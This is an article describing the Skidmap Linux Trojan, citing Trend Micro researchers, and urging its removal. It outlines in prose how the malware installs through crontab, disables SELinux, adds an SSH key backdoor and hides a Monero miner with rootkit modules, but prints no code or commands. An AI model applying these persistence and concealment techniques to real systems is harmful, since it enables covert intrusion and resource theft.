Linux users need to listen up – a malicious Trojan capable of injecting and concealing a cryptocurrency miner is off the leash. Skidmap is its name, and the actors behind this threat are unknown. It is also unknown if they have specific targets or if they are going after any vulnerable operating system. Without a doubt, vulnerable systems that have not been updated and whose security backdoors and flaws had not been fixed are the ones that are most likely to be susceptible to this malware. Unfortunately, the infection slithers in silently, it uses different functionalities to conceal itself, and it acts without alerting the user or security systems. Due to this, it might stay unnoticed for a long time. Once it is detected, the removal of this infection must not be delayed. Unfortunately, deleting Skidmap is not a walk in the park.
Skidmap exploits a process that exists on Linux operating systems. It is called crontab, and although it is originally used to schedule jobs on operating systems, the malicious infection uses it to install itself. Once the installer runs, the Skidmap Trojan is downloaded without notice. To ensure that the threat is not detected and deleted right away, the attackers have set it up to mess with the security settings. This is done using two files. The /usr/sbin/setenforce file reconfigures the Security-Enhanced Linux (SELinux) module, and the /etc/selinux/config file creates two commands, which disable the Security-Enhanced Linux policy and run processes in confined domains. According to Augusto Remillano and Jakub Urbanec – the researchers who discovered the threat – the Trojan also provides the attackers access to the infected system via a backdoor. This backdoor is created by adding a public key to the authorized_keys file. With this backdoor open, the attackers can do pretty much whatever they want, and that is why the removal of this dangerous Trojan is so important.
The devious Trojan employs a variant of the XMRig miner to mine for Monero, a well-known and widely-used cryptocurrency. The infection either injects the miner to /tmp/miner2 using the backdoor, or it downloads and installs the tool from the web. Although miners are usually pretty noticeable because they use up CPU resources, which might make computer runs slowe or even experience crashes, Skidmap is pretty good ant concealing the tool. In fact, the threat is able to conceal network traffic and CPU data to trick the victim into thinking that whatever symptoms they might be experiencing are not related to malicious activity or an all-consuming miner. The netlink component (a rootkit) that the Trojan employs is crucial for that. Other components include iproute (hides files), kaudited (downloads loadable kernel modules), and a fictitious “rm” binary (downloads and executes files). This fake binary is used when the miner is downloaded from the web, as opposed to being injected via a backdoor.
An infection that opens a backdoor, that allows remote attackers to create commands, disable security, and execute files, and that makes it easy to make money at the expense of your system’s resources cannot be ignored. Skidmap is such a threat, and its removal is crucial. Unfortunately, its rootkit components can make it difficult to eliminate it completely, and manual removal is not recommended. Luckily, there are plenty of legitimate and trustworthy tools that you can use to remove Skidmap automatically. Just make sure you install legitimate tools, and not malware that is presented as genuine anti-malware software. After successful removal, it is important that you start taking your virtual security much more seriously. At the end of the day, there are plenty of cybercriminals, who focus on invading Linux systems, and their job is much easier if these systems are left vulnerable and outdated.
Augusto Remillano and Jakub Urbanec. September 16, 2019. Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Trend Micro.